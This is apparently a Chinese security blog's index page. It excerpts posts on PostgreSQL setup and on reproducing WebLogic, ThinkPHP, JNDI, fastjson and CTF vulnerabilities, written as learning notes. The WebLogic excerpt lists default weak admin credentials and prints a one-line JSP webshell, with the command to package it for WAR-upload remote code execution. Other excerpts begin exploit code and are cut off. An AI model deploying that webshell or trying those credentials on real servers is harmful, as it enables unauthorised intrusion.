PostgreSQL总结
安装:Windows官网下载: https://www.postgresql.org/download/windows/设置一个管理员密码,需要记住
通过 psql 连接 PostgreSQL:去bin目录,或者配个环境变量12psql.exe –U postgres输入口令即可
或者直接打开SQL Shell,前面默认最好输个口令
pgAdmin4直接打开也行
docker1docker pull postgres:12.3
创建本地卷1docker volume create pgdata
查看卷1docker volume inspect pgdata
启动容器1docker run --name postgres12 -e POSTGRES_PASSWORD=123456 -p 5040:5040 -v pgdata:/var/lib/postgresql/data -d postgres:12.3
-d指定镜像,-v指定卷映射这个pgdata的数据我好奇放哪里了,因为我是Windows cmd开的,就去网上搜了一下,最终在"\\wsl$\docker-desktop ...
第二届AliyunCTF chain17复现
分析这题给了一个客户端client和一个服务端serverserver端就一个jooq依赖,一个read路由的反序列化点client端有hessian,hutool,h2依赖123456789101112131415161718<dependency> <groupId>com.alibaba</groupId> <artifactId>hessian-lite</artifactId> <version>3.2.13</version></dependency><dependency> <groupId>cn.hutool</groupId> <artifactId>hutool-all</artifactId> <version>5.8.16</version></dependency><!-- https://mvnrepository.com/ar ...
Weblogic学习2-一些历史漏洞的复现
Weblogic 弱口令&&文件上传/console路由:常见弱口令:
账户
密码
system
password
weblogic
weblogic
guest
guest
portaladmin
portaladmin
admin
security
joe
password
mary
password
system
security
wlcsystem
wlcsystem
wlcsystem
sipisystem
其他常见密码1234567weblogic1 weblogic12 weblogic123 weblogic@123 webl0gic weblogic# weblogic@
上传war包RCE:随便写一句话木马12<% Runtime.getRuntime().exec(request.getParameter("cmd"));%>打包1jar cvf test.war test.jsp先锁定并编辑,部署,安装上传文件一直下一步.完成,先左上角点激活 ...
Weblogic学习1&&CVE-2015-4852分析
环境配置weblogic下载链接: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html选择10.3.6的Generic版本下载本地cmd执行:1java -D64 -jar wls1036_generic.jar这里报错了上网查了一下发现路径不能有中文,换个目录,正常安装一直下一步就行,安装完会自动运行quickstart创建新的weblogic域,这里我会报错在执行/Middleware/wlserver_10.3/common/bin/config.exe的时候无法创建jvm,把jdk版本换成jdk1.7_80重新装一次就好了一直下一步,配置域的名称和位置配置管理员用户名和密码下一步选择生产模式,jdk选择下一步选受管服务器、集群和计算机后面就一直下一步就行
安装完成后进入Middleware\user_projects\domains\base_domain双击运行startWebLogic.cmd,输入刚才填的用户名和密码访问: http://127.0.0.1:7001/c ...
thinkphp全版本漏洞复现总结
这个是之前学的,当复习重新看一遍,顺便发到很久没更的博客里
基础知识安装:1composer create-project topthink/think=5.0.* tp5 --prefer-dist
表示安装最新的5.0版本,这里是5.0.24,这里的tp5目录名可以任意更改,如果之前安装过,则切换到tp5应用根目录下,执行:1composer update topthink/framework如果很卡:1234指定国内源composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/composer config -g -l
此时安装成功会有一个提示composer audit可以查看历史漏洞,我们进入www.tp5.com目录查看一下发现有7个CVE,后面会一个个分析
一些基础目录结构在readme文件有解释12router.php用于php自带webserver支持,可用于快速测试 启动命令:php -S localhost:8888 router.php
开启调试:config. ...
JNDI绕过高版本jdk限制2-JDBC
dbcp123456789101112131415161718192021222324252627282930313233343536373839404142434445import com.sun.jndi.rmi.registry.ReferenceWrapper;import com.sun.xml.internal.ws.api.ha.StickyFeature;import org.apache.naming.ResourceRef;import javax.naming.Reference;import javax.naming.StringRefAddr;import java.rmi.RemoteException;import java.rmi.registry.LocateRegistry;import java.rmi.registry.Registry;public class ldapbypass { private static Reference dbcpByFactory(String factory){ Refe ...
JNDI绕过高版本jdk限制1
限制:123JDK 6u141、7u131、8u121之后:增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。
绕过jdk8u121-jdk8u191: 就是把rmi协议改成ldap协议就行
jdk8u191之后:
本地类作为Reference Factory那些类的要求:
传入的 Factory 类必须实现 ObjectFactory 接口类,至少有一个getObjectInstance()方法
恶意类的只有一个参数,参数类型是String.class的可以执行危险函数
ELProcessorpoe.xm ...
fastjson篇2-漏洞复现和版本绕过
1.2.24基于TemplatesImpl的利用链这个链子和CC3有点像,Java动态加载字节码当时CC3是:1TemplatesImpl#newTransformer()->TemplatesImpl#getTransletInstance()->....但是getTransletInstance()不符合fastjson反序列化调用get方法的要求,它返回的是一个抽象类AbstractTranslet因此寻找谁调用的TemplatesImpl#newTransformer()找到getOutputProperties()`方法,符合要求12getOutputProperties() ---> newTransformer() ---> TransformerImpl(getTransletInstance(), _outputProperties, _indentNumber, _tfactory);
Evil.java123456789101112131415161718import com.sun.org.apache.xalan.internal ...
fastjson篇1-基础用法
Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换。
两个接口:
JSON.toJSONString 将 Java 对象转换为 json 对象,序列化的过程。
JSON.parseObject/JSON.parse 将 json 对象重新变回 Java 对象;反序列化的过程
poe.xml12345678910<dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</version></dependency><dependency> <groupId>commons-dbcp</groupId> <artifactId>commons-dbcp</artifactId> ...
2023 0CTF newdiary复现
app.js12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020 ...